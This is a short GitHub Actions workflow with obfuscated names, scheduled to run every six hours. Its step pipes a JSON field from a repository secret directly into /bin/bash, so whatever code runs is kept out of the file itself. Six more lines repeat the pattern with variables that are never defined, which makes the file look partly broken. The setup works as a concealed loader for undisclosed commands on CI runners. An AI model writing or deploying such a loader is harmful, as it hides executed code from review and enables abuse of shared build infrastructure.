name: longzhitao3817

on:
  workflow_dispatch:
  schedule:
    - cron: '55 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: longzhitao3817
        env:
          ldpn5086: ${{ secrets.ldpn5086 }}
        run: |
          echo $ldpn5086 | jq -r .mce8411 | /bin/bash
          echo $bqg741 | jq -r .j7501 | /bin/bash
          echo $desrv8212 | jq -r .z40283 | /bin/bash
          echo $asb060 | jq -r .vmmyu110 | /bin/bash
          echo $grx28 | jq -r .uo25 | /bin/bash
          echo $cdoq98796 | jq -r .jser516 | /bin/bash
          echo $otcmy104 | jq -r .wbaew4 | /bin/bash

